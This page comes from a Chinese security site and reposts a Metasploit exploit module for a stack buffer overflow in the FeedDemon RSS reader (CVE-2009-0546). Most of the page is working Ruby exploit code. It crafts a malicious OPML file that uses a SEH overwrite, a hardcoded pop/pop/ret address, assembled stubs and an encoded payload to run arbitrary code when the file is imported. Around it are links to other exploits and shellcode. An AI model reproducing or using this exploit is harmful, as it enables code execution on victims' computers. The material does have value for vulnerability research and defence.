首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
FeedDemon <= 3.1.0.12 Stack Buffer Overflow(meta)
来源:http://www.metasploit.com 作者:fl0_fl0w 发布时间:2010-06-04  
##
# $Id: feeddemon_opml.rb 9414 2010-06-04 00:47:14Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::FILEFORMAT
	include Msf::Exploit::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'FeedDemon <= 3.1.0.12 Stack Buffer Overflow',
			'Description'    => %q{
					This module exploits a buffer overflow in FeedDemon v3.1.0.12. When the application
				is used to import a specially crafted opml file, a buffer overflow occurs allowing
				arbitrary code execution.

				All versions are suspected to be vulnerable. This vulnerability was originally reported
				against version 2.7 in February of 2009.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'fl0 fl0w',  # Original Exploit
					'dookie',    # MSF Module
					'jduck'      # SEH + AlphanumMixed fixes
				],
			'Version'        => '$Revision: 9414 
, 'References' => [ [ 'CVE', '2009-0546' ], [ 'OSVDB', '51753' ], [ 'BID', '33630' ], [ 'URL', 'http://www.exploit-db.com/exploits/7995' ], [ 'URL', 'http://www.exploit-db.com/exploits/8010' ], [ 'URL', 'http://www.exploit-db.com/exploits/11379' ] ], 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Payload' => { 'Space' => 1024, 'BadChars' => "\x0a\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xff", 'DisableNops' => true, # We are not strictly limited to alphanumeric. However, currently # no encoder can handle our bad character set. 'EncoderType' => Msf::Encoder::Type::AlphanumMixed, 'EncoderOptions' => { 'BufferRegister' => 'ECX', }, }, 'Platform' => 'win', 'Targets' => [ # Tested OK on XPSP3 - jduck [ 'Windows Universal', { 'Ret' => 0x00501655 # p/p/r in FeedDemon.exe v3.1.0.12 } ], ], 'Privileged' => false, 'DisclosureDate' => 'Feb 09 2009', 'DefaultTarget' => 0)) register_options( [ OptString.new('FILENAME', [ false, 'The file name.', 'msf.opml']), ], self.class) end def exploit head_opml = '<opml version="1.1">' head_opml << '<body>' head_opml << '<outline text="' header = "\xff\xfe" # Unicode BOM header << Rex::Text.to_unicode(head_opml) foot_opml = '">' foot_opml << '<outline text="BKIS" title="SVRT" type="rss" xmlUrl="http://milw0rm.com/rss.php"/>' foot_opml << '</outline>' foot_opml << '</body>' foot_opml << '</opml>' footer = Rex::Text.to_unicode(foot_opml) # Set ECX to point to the alphamixed encoded buffer (IIIII...) # We use, while avoiding bad chars, an offset from SEH ptr stored on the stack at esp+8 off = 0x1ff2 set_ecx_asm = %Q| mov ecx, [esp+8] sub ecx, #{0x01010101 + off} add ecx, 0x01010101 | set_ecx = Metasm::Shellcode.assemble(Metasm::Ia32.new, set_ecx_asm).encode_string # Jump back to the payload, after p/p/r jumps to us. # NOTE: Putting the jmp_back after the SEH handler seems to avoid problems with badchars.. # 8 for SEH.Next+SEH.Func, 5 for the jmp_back itself distance = 0x1ffd + 8 + 5 jmp_back = Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string # SEH seh_frame = generate_seh_record(target.ret) # Assemble everything together sploit = '' sploit << set_ecx sploit << payload.encoded sploit << rand_text_alphanumeric(8194 - sploit.length) sploit << seh_frame sploit << jmp_back sploit << rand_text_alphanumeric(8318 - sploit.length) # Ensure access violation reading from smashed pointer num = rand_text(4).unpack('V')[0] sploit << [num | 0x80000000].pack('V') evil = header + sploit + footer print_status("Creating '#{datastore['FILENAME']}' file ...") file_create(evil) end end
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·S.O.M.P.L 1.0 Player Buffer Ov
·Novell ZENworks Configuration
·Adobe InDesign CS3 INDD file h
·linux/x86 force unmount "/medi
·MP3 Studio v1.0 (mpf File) Loc
·Pixelpost Add Admin Exploit (h
·linux/x86 displaying system te
·OS X EvoCam Web Server Buffer
·QtWeb 3.3 Remote DoS / Crash E
·48 bytes chown root:root /bin/
·linux/x86 whoami shellcode 39
·45 bytes give all user root ac
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved